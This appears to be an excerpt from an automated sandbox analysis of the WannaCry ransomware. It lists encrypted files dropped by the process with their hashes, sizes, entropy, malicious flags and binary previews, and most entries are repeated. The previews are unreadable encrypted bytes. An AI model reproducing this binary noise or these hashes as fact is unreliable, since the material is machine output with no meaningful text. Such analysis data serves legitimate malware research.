                                                                              MD5:32AF38B99D6C73D6E14284570D38F07B
                                                                              SHA1:CCF3D91A93102BE787A17923D6F35109CFE546CD
                                                                              SHA-256:2A129417CF169D09F8FCA5DAB10EE8AF093F4652027101468DC6A8BAD2B670D6
                                                                              SHA-512:2A14307A6436A7ABC396073BF6EABC35FEA294E42BF072E4E813B514C446D58430A5E8FAC123761463DFFCDA73A779C6044519530D0A3623568D5A9FB80AC5EA
                                                                              Malicious:true
                                                                              Preview:WANACRY!....AU.h.r.*3.DO/.......a..>...L-..!....j..#.X.N....l.UI.U....4....~NEQPq<.-l.+d.]L...^.. .\r...._s.,.1.v.g~.7.cm.>"d".tc.I.8...1...8H. S3..HU.U(f(.BF.k...P.q..j`)hN........)0e.y.(Lx...i.".HH)...c..G........BE....uJ...;.......+qr.|.T$.c....n:.......G............t.1ej...#.(.R.AZ.Wf[...v0K..g.B..x.tOU.0.j..r......5."..U.Uc.f`..N.z.-...'-..H...L7..ku..../l....=.........y*.YO.. ...(Ih.='.m..Y.b^[#..j..P.s...."&.OoJ...GQ1.._.G......A.R....cH.....u}.....X.v2..tj.....a)+......Y.y....%.-..,.q./H...F..=.|.4....F.Ix..25n>. ....Q..E_...yw3..?7#.$..%>.TT.H.^.P.sF.c.....Sma..o.....o>....N..F*}...L..%Q......U...b ,...]....1q.4...}Dns....J.1...;..o;.w.(....M m._.....*..e....x..v.,..}..;..[T..0.r..+........SvS...-..l......z.7WK..y.2...L.]...D..X.`..cxTu......bo.P.,:..G..=..3.n.#{..P.my...sF.m.tc..Ii...J..H...(...<..X..9..9....B..p.......z..:.W....M^..`....#....X.W<.0duT.......!.w..g{......F:.{q`.....iC.."..r..~N]....%..<...b@.:=.....m.YU.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):127736
                                                                              Entropy (8bit):7.998519605363345
                                                                              Encrypted:true
                                                                              SSDEEP:3072:YLoTUmsF97Ace8/IfBHTUqnDliEjoET/mopI9/1avxz:YlBF97dCT7sS5/mQI9/wR
                                                                              MD5:13FA35EB7BE4F5CC3E3D3F7BC25BC651
                                                                              SHA1:D5EADBB9BBDD0508EFE3DB242D22B2639EF2C549
                                                                              SHA-256:90E86AEBD88604F68877EE57D180E86F4B5A534036575C2FDC398522906B4400
                                                                              SHA-512:FFD424133A15EE7E7210AA4E1F0680BCC8D0ACF7D3740894491828CA23156EF1914B3518AEA8569EF6572F85F8FA882F99E777172467F124EB4FA2057CB7BDBD
                                                                              Malicious:true
                                                                              Preview:WANACRY!..........eZ..o>.+HJ.e..:|..ft..h.....hi"....Pbh&R..3g.d..L.....ey......9.W..%.(y&z.(K..8....Z...=...)2/...2=.h......(.q(V.<.:.uq.V.o...3uL....w8....'......kxb."...&s.<......z..+A..7.....*.U.`...E...Z...x.\.3l.......)...0........K..cT|6..................'..*...+!.=..h..M...M..A....B.%..t.{...f>.$....a.....G=..a8&..8..........OW..t.c.....~MV:..N..m.~!&../....-....,...H.E..4...z N...wr...dj.d!.......p7oVP...(......V..]p.c...x.......F.C..hg.D..=ap....]...9EW..pQ...yzI)..@h....5.:2...2s.0~...sq..I...0K.(O..C...*...@...4..GR.....Z..8.w...o%..*....`0../.#.i..{_....j...]d...S.X......7....vc...".@Az...{$.. 2xO.@.A=)@h...... ....V..3......`F.,N.3...............\ .t..9.a...2...V..l=...g...@.{...y.vR....v..L?5.........O.*)...s.y.V.y.n....<oz...o.P..;b........^6.:=..hku....B....k.K..%{u..VSTEv/9.lE..$".!S/...r./.b??.I...G.UT.Wm..y3...L.a..F.....TI?...mSI...{.S.....{v.....~...N....ySJ..Z....NI@A#0y..J...a*..?...uW.@......; ".....[..uZ.<.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):127736
                                                                              Entropy (8bit):7.998519605363345
                                                                              Encrypted:true
                                                                              SSDEEP:3072:YLoTUmsF97Ace8/IfBHTUqnDliEjoET/mopI9/1avxz:YlBF97dCT7sS5/mQI9/wR
                                                                              MD5:13FA35EB7BE4F5CC3E3D3F7BC25BC651
                                                                              SHA1:D5EADBB9BBDD0508EFE3DB242D22B2639EF2C549
                                                                              SHA-256:90E86AEBD88604F68877EE57D180E86F4B5A534036575C2FDC398522906B4400
                                                                              SHA-512:FFD424133A15EE7E7210AA4E1F0680BCC8D0ACF7D3740894491828CA23156EF1914B3518AEA8569EF6572F85F8FA882F99E777172467F124EB4FA2057CB7BDBD
                                                                              Malicious:true
                                                                              Preview:WANACRY!..........eZ..o>.+HJ.e..:|..ft..h.....hi"....Pbh&R..3g.d..L.....ey......9.W..%.(y&z.(K..8....Z...=...)2/...2=.h......(.q(V.<.:.uq.V.o...3uL....w8....'......kxb."...&s.<......z..+A..7.....*.U.`...E...Z...x.\.3l.......)...0........K..cT|6..................'..*...+!.=..h..M...M..A....B.%..t.{...f>.$....a.....G=..a8&..8..........OW..t.c.....~MV:..N..m.~!&../....-....,...H.E..4...z N...wr...dj.d!.......p7oVP...(......V..]p.c...x.......F.C..hg.D..=ap....]...9EW..pQ...yzI)..@h....5.:2...2s.0~...sq..I...0K.(O..C...*...@...4..GR.....Z..8.w...o%..*....`0../.#.i..{_....j...]d...S.X......7....vc...".@Az...{$.. 2xO.@.A=)@h...... ....V..3......`F.,N.3...............\ .t..9.a...2...V..l=...g...@.{...y.vR....v..L?5.........O.*)...s.y.V.y.n....<oz...o.P..;b........^6.:=..hku....B....k.K..%{u..VSTEv/9.lE..$".!S/...r./.b??.I...G.UT.Wm..y3...L.a..F.....TI?...mSI...{.S.....{v.....~...N....ySJ..Z....NI@A#0y..J...a*..?...uW.@......; ".....[..uZ.<.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):173608
                                                                              Entropy (8bit):7.998863226406833
                                                                              Encrypted:true
                                                                              SSDEEP:3072:pN+UBmwLhMNK9LWB34a+lfNpsVh97XFx6ANfjtPXeFNBvhFqCQBL+zyPuOTXLJ:mmLhWKpQUFYVh5Vx5jtABvhcCaCrOTV
                                                                              MD5:E37B51A5162BA0EBE04BF92EDFFE2DE9
                                                                              SHA1:6FD1BC5D3485F7494332C541EF895D9019EE184A
                                                                              SHA-256:614B303B35B91365D935F6013F5C3D5854B1F9144DB37957AA46296A4055C1BA
                                                                              SHA-512:A9CF8967F568764057FD18B1311A183BF1E4F5DBA243EC6699B075238D7E6447B15AB794429D2F5895ACE8D2A07C688E5FBFB836DA79826B4482A43310AB331D
                                                                              Malicious:true
                                                                              Preview:WANACRY!........v.z.......Y*.yw....yePg...gx....)...n.|....wI...a&.......R(..!...Y\....aQ.:7h<..6...V]......\....GkC.\.....7$l6.....!..N.\.s.O!.,.=..x.uVD'...&...t.$....K._.M..L...0(.G.f.{.M.PO(...~.O...5.......~.N:d.....)...].. ..V......f.1s.~#..m.............O.1.E.4..X)p5.|9..HRD$..q........H.}`g...A.L....f.ZMS...E..7.%..1=..p...b.s....n.A......p..~_Lg..Q../w..Ng...h..2.4.l......".. ]B.....*.VQ.Z..Hzm..o.......f..z.LM..M..*r.]...!K..q.,TA%GH........^.a.....YB.....<..v..2....8.c...+.o..T{S.A_...1...$J.f.k.".y..\.....u.>.$.0mq...Yj....xl.<.h.X.1X.`.~...&.....RoR......G.%(s.m.Y......t....\.N.q.,y.q&.(...G.....).._}E+u...2.@)....r5.)...m..j...#.c..L..jK.Do.j.g|~........m....]qh.1....yG~8....|.Y....v.H.,$3e.O.f........[..M.......JU....`..........~.[...X.....e..G..dr....w.I..o..c.?.... ...4R...-."K..y...&...J.[.c.,'cD...L.`.9h.}.j..@.. (V.Q..]sJ...t,.8:)..L..<.&.....GR.%.&Z..7.t....bs3p.FW...=....b..>O.V.ZC.s>.3.n.N...G.K@..b
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):173608
                                                                              Entropy (8bit):7.998863226406833
                                                                              Encrypted:true
                                                                              SSDEEP:3072:pN+UBmwLhMNK9LWB34a+lfNpsVh97XFx6ANfjtPXeFNBvhFqCQBL+zyPuOTXLJ:mmLhWKpQUFYVh5Vx5jtABvhcCaCrOTV
                                                                              MD5:E37B51A5162BA0EBE04BF92EDFFE2DE9
                                                                              SHA1:6FD1BC5D3485F7494332C541EF895D9019EE184A
                                                                              SHA-256:614B303B35B91365D935F6013F5C3D5854B1F9144DB37957AA46296A4055C1BA
                                                                              SHA-512:A9CF8967F568764057FD18B1311A183BF1E4F5DBA243EC6699B075238D7E6447B15AB794429D2F5895ACE8D2A07C688E5FBFB836DA79826B4482A43310AB331D
                                                                              Malicious:true
                                                                              Preview:WANACRY!........v.z.......Y*.yw....yePg...gx....)...n.|....wI...a&.......R(..!...Y\....aQ.:7h<..6...V]......\....GkC.\.....7$l6.....!..N.\.s.O!.,.=..x.uVD'...&...t.$....K._.M..L...0(.G.f.{.M.PO(...~.O...5.......~.N:d.....)...].. ..V......f.1s.~#..m.............O.1.E.4..X)p5.|9..HRD$..q........H.}`g...A.L....f.ZMS...E..7.%..1=..p...b.s....n.A......p..~_Lg..Q../w..Ng...h..2.4.l......".. ]B.....*.VQ.Z..Hzm..o.......f..z.LM..M..*r.]...!K..q.,TA%GH........^.a.....YB.....<..v..2....8.c...+.o..T{S.A_...1...$J.f.k.".y..\.....u.>.$.0mq...Yj....xl.<.h.X.1X.`.~...&.....RoR......G.%(s.m.Y......t....\.N.q.,y.q&.(...G.....).._}E+u...2.@)....r5.)...m..j...#.c..L..jK.Do.j.g|~........m....]qh.1....yG~8....|.Y....v.H.,$3e.O.f........[..M.......JU....`..........~.[...X.....e..G..dr....w.I..o..c.?.... ...4R...-."K..y...&...J.[.c.,'cD...L.`.9h.}.j..@.. (V.Q..]sJ...t,.8:)..L..<.&.....GR.%.&Z..7.t....bs3p.FW...=....b..>O.V.ZC.s>.3.n.N...G.K@..b
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):59016
                                                                              Entropy (8bit):7.996589454580702
                                                                              Encrypted:true
                                                                              SSDEEP:1536:e5/PNb5T6liPo3mS9NUiT92kO+34aTIANhWV8XD2R:e5/f8WAF2234aT7KViO
                                                                              MD5:451C0295EC77431BEFD42909FC01887B
                                                                              SHA1:94A1B2C1FC558F125795CDA38F74A17B6E98FA13
                                                                              SHA-256:95BADE1013363914371A3DA11C8025E7D4008E52E23504CFD26F29A03F07F42C
                                                                              SHA-512:83AA874C850FC6A9F7ABA80AA562B5591DEFB5E1F974C892945005C7B5CFFF05DDC914017AD0E578B0FC63D2E61ACFD4AAEC9E3923070F8F6A56E6D5C3AF50A6
                                                                              Malicious:true
                                                                              Preview:WANACRY!....9...4CN#J.6..ra/.CE'v...>.y%.............W...&..b.o.3.P.U..C&.Y*.....lgch-.....R+5.i.xQ.V.......[VQSP..a?...[x......ZP....'."..BVi0....v.#.gS......di.@c........H...g..O.oPs.:./~.....%.].^.M.M&...v6B.F..k..cw.r.DsL........W~5..ck...?...p$.m...... J.]....g.......X\.n...R".<..2.}.7%]sO.=.$.4..6,.I.|\......&!.Y.e..|.0..........#.O..m%.2l..\...Ki.sG0D.m.......K..7.,#4.....Qi..I!zV..Q./.W.[.co........Q.b~A.=w.....#.)B....-.J.k.........U{.A.}....1..1......`..f...E.H...u..?...&..G.h..Ag...lnv.h.).;.7..<~..."jH..O..O.%...+@.U....@.......{.x_..?[e.H....,:.T.....Q.......90..t||.{)lL..#..d.d.1.V....."p|...h...}M..-K...$T...5...3.o.......Z..&...l..'.qc.o.:_..7...N...}...@..:\..r4;.AjF'a(.'.e.'.K:w\$..zn....7H....K[.L...p..017..!.i.....F'7m...w..,...2.fi..bo.jI...=.XX.L.g.y9..".}......c.....f.......<...../..g.._......u..v....4.Eb.N.k.5..&y.....A.QI.P.h>.....n....".Z-;.|..1..h.'.S.....5..b<G...o{c.b.s.?.Y..o.r......"/rS.._...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):59016
                                                                              Entropy (8bit):7.996589454580702
                                                                              Encrypted:true
                                                                              SSDEEP:1536:e5/PNb5T6liPo3mS9NUiT92kO+34aTIANhWV8XD2R:e5/f8WAF2234aT7KViO
                                                                              MD5:451C0295EC77431BEFD42909FC01887B
                                                                              SHA1:94A1B2C1FC558F125795CDA38F74A17B6E98FA13
                                                                              SHA-256:95BADE1013363914371A3DA11C8025E7D4008E52E23504CFD26F29A03F07F42C
                                                                              SHA-512:83AA874C850FC6A9F7ABA80AA562B5591DEFB5E1F974C892945005C7B5CFFF05DDC914017AD0E578B0FC63D2E61ACFD4AAEC9E3923070F8F6A56E6D5C3AF50A6
                                                                              Malicious:true
                                                                              Preview:WANACRY!....9...4CN#J.6..ra/.CE'v...>.y%.............W...&..b.o.3.P.U..C&.Y*.....lgch-.....R+5.i.xQ.V.......[VQSP..a?...[x......ZP....'."..BVi0....v.#.gS......di.@c........H...g..O.oPs.:./~.....%.].^.M.M&...v6B.F..k..cw.r.DsL........W~5..ck...?...p$.m...... J.]....g.......X\.n...R".<..2.}.7%]sO.=.$.4..6,.I.|\......&!.Y.e..|.0..........#.O..m%.2l..\...Ki.sG0D.m.......K..7.,#4.....Qi..I!zV..Q./.W.[.co........Q.b~A.=w.....#.)B....-.J.k.........U{.A.}....1..1......`..f...E.H...u..?...&..G.h..Ag...lnv.h.).;.7..<~..."jH..O..O.%...+@.U....@.......{.x_..?[e.H....,:.T.....Q.......90..t||.{)lL..#..d.d.1.V....."p|...h...}M..-K...$T...5...3.o.......Z..&...l..'.qc.o.:_..7...N...}...@..:\..r4;.AjF'a(.'.e.'.K:w\$..zn....7H....K[.L...p..017..!.i.....F'7m...w..,...2.fi..bo.jI...=.XX.L.g.y9..".}......c.....f.......<...../..g.._......u..v....4.Eb.N.k.5..&y.....A.QI.P.h>.....n....".Z-;.|..1..h.'.S.....5..b<G...o{c.b.s.?.Y..o.r......"/rS.._...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):20552
                                                                              Entropy (8bit):7.992116795037467
                                                                              Encrypted:true
                                                                              SSDEEP:384:Tx5w3L6bid43oGUFtpec8u6wFKaogjdw9SW1MDNtadTue:TxfiooGMtCuzRFjdw9p7ue
                                                                              MD5:1C79F922AF6F99F652D67AD7D6006958
                                                                              SHA1:887FD9F6959782AD18A43F052DBA6C3F03534D93
                                                                              SHA-256:4905BBD1D5B0B50AFA4B799F3CF14554F6A5666A5CA982BC3F4867365DD278C5
                                                                              SHA-512:EDB5D7B532F99ACF435D66706BD7CC63BDB0816DB35314115E4A338C78B22D6C0407EDEE41FFCF5ED8134E8D82F7FE60FFEABE30722CC36683763C6EBA302BB0
                                                                              Malicious:true
                                                                              Preview:WANACRY!....P...OB.....,.....[......C..y`zqe.....m..\....&w.S.Y..........4.Y.!l.........r.!...Tn.#O8.>.<...b.9.|.<...%.....Y.F.?c..*.il.;..Ew...r...-.....8?d......M"g....Q..~.R.J....u...'(.y(..J.......;.....S.o.>}.t.D.7l...b.F.{\7l}. ..g..$.a........$O.......x...Q.2.........B.t.3.%..=....8r4P.=..Xt&.}......]U.g.[..6ZaQ..kp.U3 Pw.......e...6w.F4....@.'Q....p.m-V...?.\z.#.~..V....K.,.K.D..:...y..f3......u.......B.$...,.5'}..w....../j..K.J+....(Z.w/...u.;.^?.._.i.(.....r....12....=4.......@..;....P....!i*.s.y@.j.!.J.2.a7....=2&`MR....>.i...n..d8...6;...V.sb.;.+...4..*..P..........a,....*b~..J....7...7D.A..y........].C.l...!O8..0..XdT.#l..$......lW.X..t......rXQ.....&`.......t:.....;$..t...O...%.K..k.5^.t5.T...b..../.......4......?...U..:.\'..:$9..>nX...MU.h."9.f......_.[4g...H.]...m....v3Q...8~/..j.=...Og..XF....C..|..T...-..ST...H.....c.....:.. }%......G--.....8...c.w.Fu...`..~...A......1gS.....j..Y%..+..5.n....bN...!..t..lzM
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):20552
                                                                              Entropy (8bit):7.992116795037467
                                                                              Encrypted:true
                                                                              SSDEEP:384:Tx5w3L6bid43oGUFtpec8u6wFKaogjdw9SW1MDNtadTue:TxfiooGMtCuzRFjdw9p7ue
                                                                              MD5:1C79F922AF6F99F652D67AD7D6006958
                                                                              SHA1:887FD9F6959782AD18A43F052DBA6C3F03534D93
                                                                              SHA-256:4905BBD1D5B0B50AFA4B799F3CF14554F6A5666A5CA982BC3F4867365DD278C5
                                                                              SHA-512:EDB5D7B532F99ACF435D66706BD7CC63BDB0816DB35314115E4A338C78B22D6C0407EDEE41FFCF5ED8134E8D82F7FE60FFEABE30722CC36683763C6EBA302BB0
                                                                              Malicious:true
                                                                              Preview:WANACRY!....P...OB.....,.....[......C..y`zqe.....m..\....&w.S.Y..........4.Y.!l.........r.!...Tn.#O8.>.<...b.9.|.<...%.....Y.F.?c..*.il.;..Ew...r...-.....8?d......M"g....Q..~.R.J....u...'(.y(..J.......;.....S.o.>}.t.D.7l...b.F.{\7l}. ..g..$.a........$O.......x...Q.2.........B.t.3.%..=....8r4P.=..Xt&.}......]U.g.[..6ZaQ..kp.U3 Pw.......e...6w.F4....@.'Q....p.m-V...?.\z.#.~..V....K.,.K.D..:...y..f3......u.......B.$...,.5'}..w....../j..K.J+....(Z.w/...u.;.^?.._.i.(.....r....12....=4.......@..;....P....!i*.s.y@.j.!.J.2.a7....=2&`MR....>.i...n..d8...6;...V.sb.;.+...4..*..P..........a,....*b~..J....7...7D.A..y........].C.l...!O8..0..XdT.#l..$......lW.X..t......rXQ.....&`.......t:.....;$..t...O...%.K..k.5^.t5.T...b..../.......4......?...U..:.\'..:$9..>nX...MU.h."9.f......_.[4g...H.]...m....v3Q...8~/..j.=...Og..XF....C..|..T...-..ST...H.....c.....:.. }%......G--.....8...c.w.Fu...`..~...A......1gS.....j..Y%..+..5.n....bN...!..t..lzM
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1573144
                                                                              Entropy (8bit):7.999867451373694
                                                                              Encrypted:true
                                                                              SSDEEP:24576:1wcq7SxY57SPJr/AEf6082WcUhcLtccUMWyDp0+hO9xaIARv8W68xV/qfmfcFPtF:uWWqJrtf60ZAK3ruvARx68jumkTF
                                                                              MD5:8BC32BC7B1A43F68C098839806A49328
                                                                              SHA1:1BBD593EF8C2FE760CDB5EFD3EC78AA1EAB3AE23
                                                                              SHA-256:E047DE7E803F7B1CE84805A1F31F70E2B6B20A2BAF80FF2BAF3564660C1ACDD2
                                                                              SHA-512:31E61711D9C626DC456DB67D50EEAF37C335722986023E934522C777E488D0B1E49B19D1C78B493A9EDF418D60E3F3FA1EEF4624A380326CDA67EE227169106C
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......P...`]].".;l.......o..?.E.F.a..m.X..cJ.[K.^.z....VK..5.....C..2q./.[1.r...|.fR.&...7P.i.......-.:\S..1..Ng...T......by.D..3..<.@Rk..w..yY.=..O...'~CD.eP....ZD..F.}uG..Z....xh.v>.Q!..g...~.o/.}..@`.....Q...C.......Rxa..z&#/F..V/ou.a.=..:+Y]............].......A..S.....o...*..*.AP..D3Wv.C..>..v..%......o.L.>.."........:'&.R.......$.m.....&.T..DP#{.l.+W....1.......r....)`.....Lw..^..y?.`.~.4.....3O..W...ya......U.."...5N...4.ml{...0._..G.NAfG=..b_.o..%nk.>....0.......l../Y5E...<..{.6..<.u.......%v.. JE...Bc.}..wb...$.Y....g....%.$.M.u8)........"|.y..B.......n.39.*?.(L..f)d..P.6f.o....#....!...+d19.F.....VP.xW.L.S.`...[-x-@.:.5!.....[.......g[......d-.8x.r..Uuiy..l..h....e.J...H@.\v.L..%...l..l...a....gy..P!@.....B!pb.L....I!...........\....`.8.s?. .` ..x..../.e.x.ae..tH. ..m..Y#..........Tl..nQ..*$...._.[p....._'{...e[5........g$..>:.-|!.-:..o...9.P..K.......S.p..BxTU......T2.....e...{ 1:..j..(/3....,...._.G[.......C..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1573144
                                                                              Entropy (8bit):7.999867451373694
                                                                              Encrypted:true
                                                                              SSDEEP:24576:1wcq7SxY57SPJr/AEf6082WcUhcLtccUMWyDp0+hO9xaIARv8W68xV/qfmfcFPtF:uWWqJrtf60ZAK3ruvARx68jumkTF
                                                                              MD5:8BC32BC7B1A43F68C098839806A49328
                                                                              SHA1:1BBD593EF8C2FE760CDB5EFD3EC78AA1EAB3AE23
                                                                              SHA-256:E047DE7E803F7B1CE84805A1F31F70E2B6B20A2BAF80FF2BAF3564660C1ACDD2
                                                                              SHA-512:31E61711D9C626DC456DB67D50EEAF37C335722986023E934522C777E488D0B1E49B19D1C78B493A9EDF418D60E3F3FA1EEF4624A380326CDA67EE227169106C
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......P...`]].".;l.......o..?.E.F.a..m.X..cJ.[K.^.z....VK..5.....C..2q./.[1.r...|.fR.&...7P.i.......-.:\S..1..Ng...T......by.D..3..<.@Rk..w..yY.=..O...'~CD.eP....ZD..F.}uG..Z....xh.v>.Q!..g...~.o/.}..@`.....Q...C.......Rxa..z&#/F..V/ou.a.=..:+Y]............].......A..S.....o...*..*.AP..D3Wv.C..>..v..%......o.L.>.."........:'&.R.......$.m.....&.T..DP#{.l.+W....1.......r....)`.....Lw..^..y?.`.~.4.....3O..W...ya......U.."...5N...4.ml{...0._..G.NAfG=..b_.o..%nk.>....0.......l../Y5E...<..{.6..<.u.......%v.. JE...Bc.}..wb...$.Y....g....%.$.M.u8)........"|.y..B.......n.39.*?.(L..f)d..P.6f.o....#....!...+d19.F.....VP.xW.L.S.`...[-x-@.:.5!.....[.......g[......d-.8x.r..Uuiy..l..h....e.J...H@.\v.L..%...l..l...a....gy..P!@.....B!pb.L....I!...........\....`.8.s?. .` ..x..../.e.x.ae..tH. ..m..Y#..........Tl..nQ..*$...._.[p....._'{...e[5........g$..>:.-|!.-:..o...9.P..K.......S.p..BxTU......T2.....e...{ 1:..j..(/3....,...._.G[.......C..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2097432
                                                                              Entropy (8bit):7.999899167939938
                                                                              Encrypted:true
                                                                              SSDEEP:49152:cToSiJnFiYIYT5ba3a3xmIBaM7giYbsKNdMXVYJ+b1chYEc8bf3:ckLFiYBT5Wq3xmIBaM7gxnMXd1chYEBv
                                                                              MD5:CCBBCDB09691793340C7031FD39882E4
                                                                              SHA1:1FA9581D542434ACCC67E94280352C5C4A05F1AA
                                                                              SHA-256:83E823170B3AA040F3965C56B186BDABF7F91BEE8758A67DB5ADF2C23EF24680
                                                                              SHA-512:B6759252065BC2F435ACE2347DF0F56DAEB457EB09DD35DAC40303715130AB948A48AB20970ADE05731B167939BB274C0AB3571C486C8746D5C99940C0373032
                                                                              Malicious:true
                                                                              Preview:WANACRY!....4..e.r.u...D...k.B`..JH.....P.w...((uy..$<.g...1H.j.Jm.f.b....^...f.&'V.P......c....2........cl.?DL..B.rR...?.{.../".2.......8A.x. d{:#.+,.d.c..i.0...X....)t6...t..1.g.<...P...j.4...+56%.t.l3O...O^WE...q!.......Y...Ds@x.!.Y..;px....L.i.t1u.e...E0.3{[...... .........[O.O.j.&..K7..z0H!..><{y...H.r...~.~.x.Kg...$`....l....@RC....?.)...2)_C.[9.F....N..B&..H..4....67....Z..@X].....W~H ...W..)....j.....4......V.}:C.2..c.....@.`.~.!..)XQa..2n7.."...<@..R...-G3-..0.._....5.[V.n.. F........`.8.w....@.3..._....;..=..4T.............M...g.....4.v../..[...Q,...6.dm(Nu_@.}.U..d4..g~..J..}m"'@.m......O.i.a.............xs.g.G.......nx.....a1(i..2 .c.KH:...i.X/...j.f..i...l"..3........n$x.|._..&A..c@X^g...[p. (...8....q...P..aJ..o....VS..,._.../5...95......m!..e.3m/..._..J.+......[....n...+.p.Q.........n..t......%.oB./....H..m.@.Z9Z.......x...}.8. }..:...;.8...K......`.j........L..BE+.)...t....Y.-K#^.u.I........p.Z.>..?.......<+&......C..t.5..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2097432
                                                                              Entropy (8bit):7.999899167939938
                                                                              Encrypted:true
                                                                              SSDEEP:49152:cToSiJnFiYIYT5ba3a3xmIBaM7giYbsKNdMXVYJ+b1chYEc8bf3:ckLFiYBT5Wq3xmIBaM7gxnMXd1chYEBv
                                                                              MD5:CCBBCDB09691793340C7031FD39882E4
                                                                              SHA1:1FA9581D542434ACCC67E94280352C5C4A05F1AA
                                                                              SHA-256:83E823170B3AA040F3965C56B186BDABF7F91BEE8758A67DB5ADF2C23EF24680
                                                                              SHA-512:B6759252065BC2F435ACE2347DF0F56DAEB457EB09DD35DAC40303715130AB948A48AB20970ADE05731B167939BB274C0AB3571C486C8746D5C99940C0373032
                                                                              Malicious:true
                                                                              Preview:WANACRY!....4..e.r.u...D...k.B`..JH.....P.w...((uy..$<.g...1H.j.Jm.f.b....^...f.&'V.P......c....2........cl.?DL..B.rR...?.{.../".2.......8A.x. d{:#.+,.d.c..i.0...X....)t6...t..1.g.<...P...j.4...+56%.t.l3O...O^WE...q!.......Y...Ds@x.!.Y..;px....L.i.t1u.e...E0.3{[...... .........[O.O.j.&..K7..z0H!..><{y...H.r...~.~.x.Kg...$`....l....@RC....?.)...2)_C.[9.F....N..B&..H..4....67....Z..@X].....W~H ...W..)....j.....4......V.}:C.2..c.....@.`.~.!..)XQa..2n7.."...<@..R...-G3-..0.._....5.[V.n.. F........`.8.w....@.3..._....;..=..4T.............M...g.....4.v../..[...Q,...6.dm(Nu_@.}.U..d4..g~..J..}m"'@.m......O.i.a.............xs.g.G.......nx.....a1(i..2 .c.KH:...i.X/...j.f..i...l"..3........n$x.|._..&A..c@X^g...[p. (...8....q...P..aJ..o....VS..,._.../5...95......m!..e.3m/..._..J.+......[....n...+.p.Q.........n..t......%.oB./....H..m.@.Z9Z.......x...}.8. }..:...;.8...K......`.j........L..BE+.)...t....Y.-K#^.u.I........p.Z.>..?.......<+&......C..t.5..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):37432
                                                                              Entropy (8bit):7.995469909031735
                                                                              Encrypted:true
                                                                              SSDEEP:768:LCS+4tkeVZvO3Eg+Q/atqGXQw5OuzkcCRBMEv17:V+4tx6EryaQG/jEN7
                                                                              MD5:2C5A331C4AF56471636BECEA020A3DAD
                                                                              SHA1:0D9C471C8C290C0D155F09C93469CF3291F43E1B
                                                                              SHA-256:95CC60DE34E1606D84398B1CAA823352AA98989B5F908BB44FC1582FCA4D4B57
                                                                              SHA-512:4550562B556246B163BFA31C1B9D6BA37C6111C25AB99A891FB21B09C9DAF347D055A6DD3EBC5A124BE6E07332D9E3D332E1FC5F7EC162E4FA5F70A0B4ACE07B
                                                                              Malicious:true
                                                                              Preview:WANACRY!....4p...^.!......8..5.Ix.....QPGv.5K=.a...*|5q.f...>Su.O..Z.!...C$.QU...kN.X..r4..q.?.$..%C...Wd.K.I.E..;.../...?....a.7"..Y"V{t..8qFu.o.......^-..'.....O.1.%[...S........`E..#...z?.^...T...@...P...O...'.....{.2....2....X.....p....7R........C@>............3.Z.R..S.u.K....9o)...`..4.L..A....y....E.....z..8ye.Y!...2..H......G,.'.d0m.[z!0-H{...........[?.2.....Bf9..=.....j+U..6$L.......I#:B........~..7.....m....AC.......0.... .:...............JB.d.-.....o)....WX....!.1.wS....&.y..-..W.<..d.o..-[.....:8..y.l.eT...LC.(....I<....N.....~i........@..]\.s37..C.H...V..3......y.A'L7#.B..n..hs.U<.N...Fn~7]..^.Z..#~.5..>..d.I)..j(o...~q.a..&..E$[3z.......%..Q....+ .^Y.x.M.Dl....?..|+\.z.........M9...|...P.3a.....y.....TK....y...C.Mq..OG..KQ..:...g.1....... .|.#z,v.9q.1.....I.....b..U6...(.}.-...!.S-.i...G.......c.*...9...5.....-...3.............../,..d.......m.G.cP..8....O......8.=.J......i...|J.......`.{..=3..d..9_i.n..&._.L.;...9W.!%..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):37432
                                                                              Entropy (8bit):7.995469909031735
                                                                              Encrypted:true
                                                                              SSDEEP:768:LCS+4tkeVZvO3Eg+Q/atqGXQw5OuzkcCRBMEv17:V+4tx6EryaQG/jEN7
                                                                              MD5:2C5A331C4AF56471636BECEA020A3DAD
                                                                              SHA1:0D9C471C8C290C0D155F09C93469CF3291F43E1B
                                                                              SHA-256:95CC60DE34E1606D84398B1CAA823352AA98989B5F908BB44FC1582FCA4D4B57
                                                                              SHA-512:4550562B556246B163BFA31C1B9D6BA37C6111C25AB99A891FB21B09C9DAF347D055A6DD3EBC5A124BE6E07332D9E3D332E1FC5F7EC162E4FA5F70A0B4ACE07B
                                                                              Malicious:true
